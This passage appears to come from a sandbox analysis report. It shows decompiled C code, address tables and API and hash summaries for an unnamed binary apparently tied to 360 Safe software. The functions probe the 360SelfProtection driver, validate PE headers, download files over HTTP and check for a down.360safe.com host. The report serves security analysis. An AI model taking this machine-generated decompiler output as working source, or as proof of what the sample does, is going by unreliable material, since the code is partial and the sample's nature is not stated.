					__eflags = _v56;
					if(_v56 == 0) {
						goto L17;
					}
					E00C91440( &_v68, _t127);
					goto L26;
				}
				if(_v64 == 0) {
					L5:
					E00C91440( &_v68, _t127);
					_v8 = 0xffffffff;
					_t95 = _v68 + 0xfffffff0;
					asm("lock xadd [edx], ecx");
					_t186 = (_t129 | 0xffffffff) - 1;
					goto L27;
				}
				_v48 = GetCurrentProcessId();
				_v52 = 0;
				_t172 = CreateFileW(L"\\\\.\\360SelfProtection", 0x80, 3, 0, 3, 0, 0);
				if(_t172 == 0xffffffff) {
					goto L6;
				}
				_t129 =  &_v48;
				_v44 = DeviceIoControl(_t172, 0x22204c, _t129, 4,  &_v52, 4,  &_v40, 0);
				CloseHandle(_t172);
				if(_v44 == 0 || _v52 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}













































                                                                                                                                                                                          0x00c906c0
                                                                                                                                                                                          0x00c906d4
                                                                                                                                                                                          0x00c906d9
                                                                                                                                                                                          0x00c906e5
                                                                                                                                                                                          0x00c906eb
                                                                                                                                                                                          0x00c906f0
                                                                                                                                                                                          0x00c906fd
                                                                                                                                                                                          0x00c90703
                                                                                                                                                                                          0x00c9070b
                                                                                                                                                                                          0x00c9070f
                                                                                                                                                                                          0x00c90717
                                                                                                                                                                                          0x00c90721
                                                                                                                                                                                          0x00c90726
                                                                                                                                                                                          0x00c9072b
                                                                                                                                                                                          0x00c9072e
                                                                                                                                                                                          0x00c90734
                                                                                                                                                                                          0x00c907cf
                                                                                                                                                                                          0x00c907cf
                                                                                                                                                                                          0x00c907d5
                                                                                                                                                                                          0x00c907dd
                                                                                                                                                                                          0x00c907df
                                                                                                                                                                                          0x00c907e8
                                                                                                                                                                                          0x00c907ec
                                                                                                                                                                                          0x00c907f4
                                                                                                                                                                                          0x00c907f6
                                                                                                                                                                                          0x00c907ff
                                                                                                                                                                                          0x00c90803
                                                                                                                                                                                          0x00c90810
                                                                                                                                                                                          0x00c90814
                                                                                                                                                                                          0x00c9081d
                                                                                                                                                                                          0x00c90821
                                                                                                                                                                                          0x00c90826
                                                                                                                                                                                          0x00c9082a
                                                                                                                                                                                          0x00c9082c
                                                                                                                                                                                          0x00c90852
                                                                                                                                                                                          0x00c90856
                                                                                                                                                                                          0x00c908d0
                                                                                                                                                                                          0x00c908d0
                                                                                                                                                                                          0x00c908d7
                                                                                                                                                                                          0x00c908d9
                                                                                                                                                                                          0x00c908f9
                                                                                                                                                                                          0x00c908f9
                                                                                                                                                                                          0x00c908fb
                                                                                                                                                                                          0x00c908fe
                                                                                                                                                                                          0x00c90941
                                                                                                                                                                                          0x00c90946
                                                                                                                                                                                          0x00c9094e
                                                                                                                                                                                          0x00c90952
                                                                                                                                                                                          0x00c90957
                                                                                                                                                                                          0x00c90963
                                                                                                                                                                                          0x00c9096c
                                                                                                                                                                                          0x00c90971
                                                                                                                                                                                          0x00c90973
                                                                                                                                                                                          0x00c90973
                                                                                                                                                                                          0x00c9097d
                                                                                                                                                                                          0x00c9097d
                                                                                                                                                                                          0x00c9097f
                                                                                                                                                                                          0x00c90988
                                                                                                                                                                                          0x00c90995
                                                                                                                                                                                          0x00c90995
                                                                                                                                                                                          0x00c90900
                                                                                                                                                                                          0x00c9090a
                                                                                                                                                                                          0x00c9090f
                                                                                                                                                                                          0x00c90912
                                                                                                                                                                                          0x00c90914
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c90916
                                                                                                                                                                                          0x00c9091a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9091c
                                                                                                                                                                                          0x00c90920
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c90928
                                                                                                                                                                                          0x00c9092d
                                                                                                                                                                                          0x00c90931
                                                                                                                                                                                          0x00c9093a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9093a
                                                                                                                                                                                          0x00c908e0
                                                                                                                                                                                          0x00c908ea
                                                                                                                                                                                          0x00c908f3
                                                                                                                                                                                          0x00c908f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c908f7
                                                                                                                                                                                          0x00c9085e
                                                                                                                                                                                          0x00c90862
                                                                                                                                                                                          0x00c90867
                                                                                                                                                                                          0x00c9086a
                                                                                                                                                                                          0x00c9086c
                                                                                                                                                                                          0x00c908a3
                                                                                                                                                                                          0x00c908ae
                                                                                                                                                                                          0x00c908b0
                                                                                                                                                                                          0x00c908b7
                                                                                                                                                                                          0x00c908b7
                                                                                                                                                                                          0x00c908c0
                                                                                                                                                                                          0x00c908c5
                                                                                                                                                                                          0x00c908c8
                                                                                                                                                                                          0x00c908ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c908cc
                                                                                                                                                                                          0x00c908cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c908cc
                                                                                                                                                                                          0x00c908ca
                                                                                                                                                                                          0x00c90874
                                                                                                                                                                                          0x00c9087d
                                                                                                                                                                                          0x00c90882
                                                                                                                                                                                          0x00c9088e
                                                                                                                                                                                          0x00c90897
                                                                                                                                                                                          0x00c9089c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9089c
                                                                                                                                                                                          0x00c9082e
                                                                                                                                                                                          0x00c90832
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c90838
                                                                                                                                                                                          0x00c9083c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c90848
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c90848
                                                                                                                                                                                          0x00c9073e
                                                                                                                                                                                          0x00c907a3
                                                                                                                                                                                          0x00c907a9
                                                                                                                                                                                          0x00c907ae
                                                                                                                                                                                          0x00c907ba
                                                                                                                                                                                          0x00c907c3
                                                                                                                                                                                          0x00c907c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c907c8
                                                                                                                                                                                          0x00c90757
                                                                                                                                                                                          0x00c9075b
                                                                                                                                                                                          0x00c90765
                                                                                                                                                                                          0x00c9076a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9077b
                                                                                                                                                                                          0x00c9078d
                                                                                                                                                                                          0x00c90791
                                                                                                                                                                                          0x00c9079b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C8FF60: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360Safe\Liveup,00000000,00000201,?,8A9E1774,00000000,?,?,00000000), ref: 00C8FFDA
                                                                                                                                                                                            • Part of subcall function 00C8FF60: _memset.LIBCMT ref: 00C90000
                                                                                                                                                                                            • Part of subcall function 00C8FF60: _swscanf.LIBCMT ref: 00C9007E
                                                                                                                                                                                            • Part of subcall function 00C8FF60: StrCmpNIW.SHLWAPI(?,ffffffff,00000008,?,?,00D48AA8,00000064,?,00000000), ref: 00C900B8
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00C90740
                                                                                                                                                                                          • CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000), ref: 00C9075F
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00C90786
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C90791
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C908C0
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C908E0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseControlCreateCurrentDeviceFileHandleOpenProcessSleep__wcsicoll_memset_swscanf
                                                                                                                                                                                          • String ID: \\.\360SelfProtection
                                                                                                                                                                                          • API String ID: 3005933722-936859468
                                                                                                                                                                                          • Opcode ID: dd9f8357ab383f3a6f79275199f3c80609330f90ab79095d858e2b9cb4d15b91
                                                                                                                                                                                          • Instruction ID: 7ee4271c67daf52bc6407ad2cb88e9daf6116ba2e1b8f4f6d48c15cb16992f7a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9f8357ab383f3a6f79275199f3c80609330f90ab79095d858e2b9cb4d15b91
                                                                                                                                                                                          • Instruction Fuzzy Hash: D881C1311083019FDB10DF28C849A5AB7E4EFC4724F258B2DF5A597291DB70EA45CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E060 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00C8E060(void* __edx, WCHAR* _a4) {
				signed int _v8;
				long _v16;
				void _v76;
				intOrPtr _v318;
				void _v324;
				long _v328;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				long _t31;
				void* _t32;
				void* _t33;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				signed int _t49;

				_t40 = __edx;
				_t51 = (_t49 & 0xfffffff8) - 0x144;
				_t16 =  *0xd64070; // 0x8a9e1774
				_v8 = _t16 ^ (_t49 & 0xfffffff8) - 0x00000144;
				_t31 = 0;
				_t46 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t46 != 0xffffffff) {
					if(ReadFile(_t46,  &_v76, 0x40,  &_v328, 0) != 0 && _v328 == 0x40) {
						_t40 = 0x5a4d;
						if(_v76 == 0x5a4d && SetFilePointer(_t46, _v16, 0, 0) == _v16) {
							_t40 =  &_v324;
							if(ReadFile(_t46,  &_v324, 0xf8,  &_v328, 0) != 0 && _v328 == 0xf8 && _v324 == 0x4550 && _v318 != 0) {
								_t31 = 1;
							}
						}
					}
					CloseHandle(_t46);
					_pop(_t43);
					_pop(_t47);
					_pop(_t32);
					return E00D0071A(_t31, _t32, _v8 ^ _t51, _t40, _t43, _t47);
				} else {
					_pop(_t44);
					_pop(_t48);
					_pop(_t33);
					return E00D0071A(0, _t33, _v8 ^ _t51, _t40, _t44, _t48);
				}
			}






















                                                                                                                                                                                          0x00c8e060
                                                                                                                                                                                          0x00c8e066
                                                                                                                                                                                          0x00c8e06c
                                                                                                                                                                                          0x00c8e073
                                                                                                                                                                                          0x00c8e080
                                                                                                                                                                                          0x00c8e095
                                                                                                                                                                                          0x00c8e09a
                                                                                                                                                                                          0x00c8e0cf
                                                                                                                                                                                          0x00c8e0d8
                                                                                                                                                                                          0x00c8e0e5
                                                                                                                                                                                          0x00c8e10f
                                                                                                                                                                                          0x00c8e119
                                                                                                                                                                                          0x00c8e136
                                                                                                                                                                                          0x00c8e136
                                                                                                                                                                                          0x00c8e119
                                                                                                                                                                                          0x00c8e0e5
                                                                                                                                                                                          0x00c8e13c
                                                                                                                                                                                          0x00c8e149
                                                                                                                                                                                          0x00c8e14a
                                                                                                                                                                                          0x00c8e14d
                                                                                                                                                                                          0x00c8e158
                                                                                                                                                                                          0x00c8e09c
                                                                                                                                                                                          0x00c8e09e
                                                                                                                                                                                          0x00c8e09f
                                                                                                                                                                                          0x00c8e0a0
                                                                                                                                                                                          0x00c8e0b2
                                                                                                                                                                                          0x00c8e0b2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00C8E08F
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000040,00000000,00000000,?,?), ref: 00C8E0CB
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 00C8E0F4
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,000000F8,00000000,00000000), ref: 00C8E115
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?), ref: 00C8E13C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlePointer
                                                                                                                                                                                          • String ID: @$PE
                                                                                                                                                                                          • API String ID: 3856724686-957972822
                                                                                                                                                                                          • Opcode ID: 4812ff1bf722875edfed2a667d31438564ba11be6e7feecf858661d8ac894c6b
                                                                                                                                                                                          • Instruction ID: b8c00a28ecda84fb4608a6ba08332581856d312ce6c7a8f6a2586903011694e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4812ff1bf722875edfed2a667d31438564ba11be6e7feecf858661d8ac894c6b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40213D71305704ABE630EA689C95FEE7398EB84714F004529FAA9871C0E7B85E058BA7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8ABF5 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E00C8ABF5(void* __eax, signed int __esi, void* __ebp, void* _a4, void* _a8, long _a12, short _a1084, short _a1136, signed int _a9440) {
				void _v4;
				void* _v8;
				intOrPtr _v24;
				void* _v28;
				void _v52;
				void _v68;
				long _v84;
				long _v96;
				WCHAR* _v100;
				intOrPtr _v104;
				long _v112;
				intOrPtr _v116;
				void* _t33;
				void* _t35;
				long _t36;
				void* _t37;
				long _t59;
				long _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				signed int _t69;
				void* _t78;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t89;
				void* _t91;
				signed int _t92;

				_t33 = __eax;
				do {
					_t1 = _t33 + "/"; // 0x2f
					_t69 =  *_t1 & 0x0000ffff;
					 *(_t92 + _t33 + 0x470) = _t69;
					_t33 = _t33 + 2;
				} while (_t69 != 0);
				asm("sbb esi, esi");
				_t65 = ( ~__esi & 0x00800000) + 0x80000000;
				_t35 = HttpOpenRequestW(__ebp, L"HEAD",  &_a1136, L"HTTP/1.1", 0xd47270, 0, _t65, 0);
				_t84 = _t35;
				_a4 = _t35;
				_t36 = E00C8A900(_t84);
				_t77 = _t36;
				if(_t36 == 0) {
					L23:
					_t37 = _a4;
					if(_t37 != 0) {
						InternetCloseHandle(_t37);
					}
					_t66 = _a8;
					_t89 = _v8;
					if(_t89 != 0) {
						InternetCloseHandle(_t89);
					}
					if(_t66 != 0) {
						InternetCloseHandle(_t66);
					}
					_pop(_t67);
					_pop(_t78);
					_pop(_t85);
					return E00D0071A(_t77, _t67, _a9440 ^ _t92, _t76, _t78, _t85);
				}
				_t76 =  &_v4;
				_v4 = 0;
				_a12 = 4;
				if(HttpQueryInfoW(_t84, 0x20000005,  &_v4,  &_a12, 0) == 0 || _v24 <= 0x3e800000) {
					_t76 = _v28;
					_t86 = HttpOpenRequestW(_v28, L"GET",  &_a1084, L"HTTP/1.1", 0xd47270, 0, _t65, 0);
					_v52 = 0x2bf20;
					InternetSetOptionW(_t86, 5,  &_v52, 4);
					InternetSetOptionW(_t86, 6,  &_v68, 4);
					_t77 = E00C8A900(_t86);
					__eflags = _t77;
					if(_t77 == 0) {
						L21:
						__eflags = _t86;
						if(_t86 != 0) {
							InternetCloseHandle(_t86);
						}
						goto L23;
					}
					_t76 = _v100;
					_t91 = CreateFileW(_v100, 0x40000000, 3, 0, 2, 0x80, 0);
					__eflags = _t91 - 0xffffffff;
					if(__eflags != 0) {
						_push(0x80000);
						_t68 = E00CFCE8A(_t65, _t76, _t77, __eflags);
						_t77 = 0;
						_t92 = _t92 + 4;
						__eflags = _t68;
						if(_t68 == 0) {
							L19:
							FlushFileBuffers(_t91);
							CloseHandle(_t91);
							__eflags = _t68;
							if(__eflags != 0) {
								_push(_t68);
								E00D00BDC(_t68, _t76, _t77, _t86, __eflags);
								_t92 = _t92 + 4;
							}
							goto L21;
						}
						_v100 = 0;
						_v68 = 0;
						_v96 = 0;
						E00D006A0(0, _t68, 0, 0x80000);
						_t92 = _t92 + 0xc;
						_t77 = InternetReadFile(_t86, _t68, 0x80000,  &_v96);
						__eflags = _t77;
						if(_t77 == 0) {
							goto L19;
						} else {
							goto L11;
						}
						do {
							L11:
							_t59 = _v112;
							_t77 = 0;
							__eflags = _t59;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									__eflags = _v116 - _v104;
									if(_v116 == _v104) {
										_t77 = 1;
									}
									goto L19;
								}
								goto L15;
							}
							_v116 = _v116 + _t59;
							_t77 = WriteFile(_t91, _t68, _t59,  &_v84, 0);
							__eflags = _t77;
							if(_t77 == 0) {
								goto L19;
							}
							FlushFileBuffers(_t91);
							L15:
							_v112 = 0;
							E00D006A0(_t77, _t68, 0, 0x80000);
							_t92 = _t92 + 0xc;
							_t76 =  &_v112;
							_t77 = InternetReadFile(_t86, _t68, 0x80000,  &_v112);
							__eflags = _t77;
						} while (_t77 != 0);
						goto L19;
					}
					_t77 = 0;
					goto L21;
				} else {
					_t77 = 0;
					goto L23;
				}
			}
































                                                                                                                                                                                          0x00c8abf5
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac00
                                                                                                                                                                                          0x00c8ac07
                                                                                                                                                                                          0x00c8ac0f
                                                                                                                                                                                          0x00c8ac12
                                                                                                                                                                                          0x00c8ac19
                                                                                                                                                                                          0x00c8ac29
                                                                                                                                                                                          0x00c8ac4c
                                                                                                                                                                                          0x00c8ac4e
                                                                                                                                                                                          0x00c8ac50
                                                                                                                                                                                          0x00c8ac54
                                                                                                                                                                                          0x00c8ac59
                                                                                                                                                                                          0x00c8ac5d
                                                                                                                                                                                          0x00c8ae08
                                                                                                                                                                                          0x00c8ae08
                                                                                                                                                                                          0x00c8ae0e
                                                                                                                                                                                          0x00c8ae11
                                                                                                                                                                                          0x00c8ae11
                                                                                                                                                                                          0x00c8ae17
                                                                                                                                                                                          0x00c8ae1b
                                                                                                                                                                                          0x00c8ae21
                                                                                                                                                                                          0x00c8ae24
                                                                                                                                                                                          0x00c8ae24
                                                                                                                                                                                          0x00c8ae2d
                                                                                                                                                                                          0x00c8ae30
                                                                                                                                                                                          0x00c8ae30
                                                                                                                                                                                          0x00c8ae36
                                                                                                                                                                                          0x00c8ae39
                                                                                                                                                                                          0x00c8ae3a
                                                                                                                                                                                          0x00c8ae4f
                                                                                                                                                                                          0x00c8ae4f
                                                                                                                                                                                          0x00c8ac6a
                                                                                                                                                                                          0x00c8ac77
                                                                                                                                                                                          0x00c8ac7f
                                                                                                                                                                                          0x00c8ac8f
                                                                                                                                                                                          0x00c8aca2
                                                                                                                                                                                          0x00c8accb
                                                                                                                                                                                          0x00c8acd7
                                                                                                                                                                                          0x00c8acdf
                                                                                                                                                                                          0x00c8aceb
                                                                                                                                                                                          0x00c8acf2
                                                                                                                                                                                          0x00c8acf4
                                                                                                                                                                                          0x00c8acf6
                                                                                                                                                                                          0x00c8adfd
                                                                                                                                                                                          0x00c8adfd
                                                                                                                                                                                          0x00c8adff
                                                                                                                                                                                          0x00c8ae02
                                                                                                                                                                                          0x00c8ae02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8adff
                                                                                                                                                                                          0x00c8acfc
                                                                                                                                                                                          0x00c8ad19
                                                                                                                                                                                          0x00c8ad1b
                                                                                                                                                                                          0x00c8ad1e
                                                                                                                                                                                          0x00c8ad27
                                                                                                                                                                                          0x00c8ad31
                                                                                                                                                                                          0x00c8ad33
                                                                                                                                                                                          0x00c8ad35
                                                                                                                                                                                          0x00c8ad38
                                                                                                                                                                                          0x00c8ad3a
                                                                                                                                                                                          0x00c8ade2
                                                                                                                                                                                          0x00c8ade3
                                                                                                                                                                                          0x00c8adea
                                                                                                                                                                                          0x00c8adf0
                                                                                                                                                                                          0x00c8adf2
                                                                                                                                                                                          0x00c8adf4
                                                                                                                                                                                          0x00c8adf5
                                                                                                                                                                                          0x00c8adfa
                                                                                                                                                                                          0x00c8adfa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8adf2
                                                                                                                                                                                          0x00c8ad47
                                                                                                                                                                                          0x00c8ad4b
                                                                                                                                                                                          0x00c8ad4f
                                                                                                                                                                                          0x00c8ad53
                                                                                                                                                                                          0x00c8ad58
                                                                                                                                                                                          0x00c8ad6d
                                                                                                                                                                                          0x00c8ad6f
                                                                                                                                                                                          0x00c8ad71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ad73
                                                                                                                                                                                          0x00c8ad73
                                                                                                                                                                                          0x00c8ad73
                                                                                                                                                                                          0x00c8ad77
                                                                                                                                                                                          0x00c8ad79
                                                                                                                                                                                          0x00c8ad7b
                                                                                                                                                                                          0x00c8ad9f
                                                                                                                                                                                          0x00c8add7
                                                                                                                                                                                          0x00c8addb
                                                                                                                                                                                          0x00c8addd
                                                                                                                                                                                          0x00c8addd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8addb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ad9f
                                                                                                                                                                                          0x00c8ad7d
                                                                                                                                                                                          0x00c8ad90
                                                                                                                                                                                          0x00c8ad92
                                                                                                                                                                                          0x00c8ad94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ad97
                                                                                                                                                                                          0x00c8ada1
                                                                                                                                                                                          0x00c8ada9
                                                                                                                                                                                          0x00c8adb1
                                                                                                                                                                                          0x00c8adb6
                                                                                                                                                                                          0x00c8adb9
                                                                                                                                                                                          0x00c8adcb
                                                                                                                                                                                          0x00c8adcd
                                                                                                                                                                                          0x00c8adcd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8add1
                                                                                                                                                                                          0x00c8ad20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ac9b
                                                                                                                                                                                          0x00c8ac9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ac9b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,00D47270,00000000,-80000000,00000000), ref: 00C8AC4C
                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,20000005,?,?,00000000), ref: 00C8AC87
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE11
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE24
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00C8AE30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleInternet$Http$InfoOpenQueryRequest
                                                                                                                                                                                          • String ID: HEAD$HTTP/1.1
                                                                                                                                                                                          • API String ID: 3096025344-444587761
                                                                                                                                                                                          • Opcode ID: 5503303beda0ce267f2dec3f858a2f95228e4e22a14765541cb282d6da068e78
                                                                                                                                                                                          • Instruction ID: c1fd91fe2f0a56e07e68bff3d171de8f8613c8af950c29ab06e50b14afa2d728
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5503303beda0ce267f2dec3f858a2f95228e4e22a14765541cb282d6da068e78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821D171604301AFE760AB668C45B6B77E8EFD4748F080829FA99C7241DB749E048BA7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B861 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00C9B861(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t16;
				void* _t22;
				signed int _t26;
				signed int _t27;
				void* _t29;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t50;
				void* _t52;

				_t42 = __edx;
				_t32 = __ebx;
				_push(8);
				E00D0155A(0xd3018e, __ebx, __edi, __esi);
				_t44 =  *((intOrPtr*)(_t52 + 8));
				_t46 = E00C981DD( *((intOrPtr*)(_t52 + 8)), ":", 0);
				_t56 = _t46;
				if(_t46 <= 0) {
					L8:
					_t16 = 1;
					__eflags = 1;
				} else {
					_push(_t46);
					_push(_t52 - 0x14);
					E00C9B7A4(__ebx, _t44, _t44, _t46, _t56);
					 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
					if(E00D00DF1(_t42,  *((intOrPtr*)(_t52 - 0x14)), L"http") != 0) {
						L7:
						E00C9820F(_t52 - 0x14);
						goto L8;
					} else {
						_t47 = _t46 + 3;
						_t22 = E00C981DD(_t44, "/", _t47);
						_t58 = _t22;
						if(_t22 <= 0) {
							goto L7;
						} else {
							_push(_t22 - _t47);
							_push(_t47);
							_push(_t52 - 0x10);
							E00C9B742(_t32, _t44, _t44, _t47, _t58);
							_t26 = E00D00DF1(_t42,  *((intOrPtr*)(_t52 - 0x10)), L"down.360safe.com");
							asm("sbb esi, esi");
							_t50 =  ~_t26 + 1;
